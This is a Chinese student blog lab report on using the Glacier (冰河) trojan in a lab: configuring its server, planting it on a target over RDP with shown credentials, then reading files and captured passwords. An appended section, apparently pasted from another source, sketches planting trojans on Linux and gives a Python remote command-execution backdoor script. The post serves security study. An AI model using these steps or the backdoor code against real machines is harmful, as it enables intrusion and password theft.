冰河木马的使用实验

本文详述了一次使用冰河木马进行远程监控的实验过程,包括服务端配置、上线目标主机、远程操作及卸载。旨在学习网络安全知识,探讨木马使用与防范。

前言:

作者是一个普通高校学生,在博客上开通了[网络安全学习]专栏,以此激励自己坚持学习。由于是初次进行博客创作、经验不足、可能比较粗糙,如有错漏之处希望大家能够指正、也欢迎大家一起交流学习。

如需查看完整学习博文(笔记)请点击 [网络安全学习] 进行查看

注:本实验只为与大家一起学习探讨网络安全学习,请勿用作恶意途径。

一、实验目的及要求

(1)了解冰河木马的使用

(2)掌握木马防范措施

二、实验仪器、设备或软件

软件:冰河木马名为冰河远程监控软件,在推出伊始便饱受追捧,作为一款强大的远程监控软件,它具有非常丰富的监控功能,包括:自动跟踪目标屏幕变化、记录各种口令信息、获取系统信息、限制系统功能、远程文件操作、注册表操作、点对点通讯等。

三、实验内容及步骤

一、配置服务端

1.1 双击“G_Client.exe”打开冰河软件。如图 1 所示。

img

图1打开冰河软件

1.2 点击菜单栏中的“设置”->“配置服务器程序”打开“服务器配置”对话框,设置“访问口令”、“进 程名称”等选项。如图 2 所示。

img

图2服务器配置

1.3 点击“确定”按钮完成服务端程序配置。

二、上线目标主机

2.1 依次点击“开始”->“运行”,输入命令“mstsc”打开“远程桌面连接”对话框。如图 3 所示。

img

图3打开远程桌面连接

2.2 点击“选项”按钮,选择“本地资源”标签,勾选“磁盘驱动器”一栏。如图 4 所示。

img

图4设置本地资源

2.3 切换到“常规”选项卡,“计算机”一栏填入目标主机地址“192.168.168.200”,“用户名”一栏填入“Administrator”,“密码”一栏填入“aa123456”。如图 5 、6所示。

img

图5 远程桌面连接配置

img

图6 远程桌面连接配置

2.4 点击“连接”按钮,弹出的安全警告可忽略,成功连接到目标机,打开“我的电脑”->“\tsclient\C\Documents andSettings\Administrator\桌面\网络安全\冰河木马安全测试”,将“G_Server.exe”复制到桌面。如图 7 所示。

img

图7 把服务器复制到目标机上

2.5 双击“G_Server.exe”,关闭远程连接。回到冰河主窗口,选择工具栏中的第一个图标“添加主机”,输入内容。如图 8 所示。

img

图8添加主机

2.6 点击“确定”按钮即可,展开“文件管理器”中的“target”->“C”即可查看目标主机中的文件。如图 9 所示。

img

图9查看目标主机中的文件

2.7 在“命令控制台”窗口中,可以对目标机发送各类命令获取信息。如图 10、11、12、13、14 所示。

img

图10查看系统信息及口令

img

图11历史口令查看

img

图12进程管理查看

img

图13窗口管理

img

图14服务器配置

2.9、冰河木马的卸载,如图15、16、17所示。

img

图15卸载冰河软件

img

图16卸载完毕

img

图17卸载完毕

四、实验结论

1、实验结果

利用冰河病毒软件成功实施了入侵。

五、往期博文

请点击 [网络安全学习] 进行查看

提供的参考引用中未涉及Linux系统下冰河木马实验的相关内容。冰河木马是一款曾经较为知名的木马程序,在Linux系统下进行冰河木马实验,一般可从以下方面开展: ### 实验环境搭建 需要准备一台Linux系统的虚拟机,可选用常见的Linux发行版如Ubuntu、CentOS等。同时可能需要一个模拟的目标网络环境。 ### 木马生成 在Linux系统中,可能需要使用特定的工具来生成类似冰河木马功能的恶意程序。不过,现在很多正规的安全工具不会直接支持生成木马,且制造和使用木马用于非法目的是违法的,这里仅作理论探讨。可能会使用一些脚本语言结合网络编程的知识来模拟其部分功能。 ### 植入与控制 将生成的“木马”程序植入到目标Linux系统中,可能是通过漏洞利用、社会工程学等方式。植入后,要实现对目标系统的控制,比如获取目标系统的信息、执行命令等。 ### 检测与防范 使用Linux系统自带的安全工具如防火墙(iptables)、入侵检测系统(Snort等)来检测和防范木马的攻击,分析木马的行为特征,以提高系统的安全性。 以下是一个简单的Python脚本示例,模拟一个简单的远程控制功能(仅作学习,不可用于非法用途): ```python import socket # 服务端代码 def server(): server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server_socket.bind(('0.0.0.0', 8888)) server_socket.listen(1) print("Waiting for connection...") conn, addr = server_socket.accept() print(f"Connected by {addr}") while True: command = input("Enter command: ") conn.sendall(command.encode()) if command.lower() == 'exit': break data = conn.recv(1024) print(data.decode()) conn.close() server_socket.close() # 客户端代码 def client(): client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) client_socket.connect(('127.0.0.1', 8888)) while True: data = client_socket.recv(1024) command = data.decode() if command.lower() == 'exit': break import subprocess result = subprocess.getoutput(command) client_socket.sendall(result.encode()) client_socket.close() ```
评论 4
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值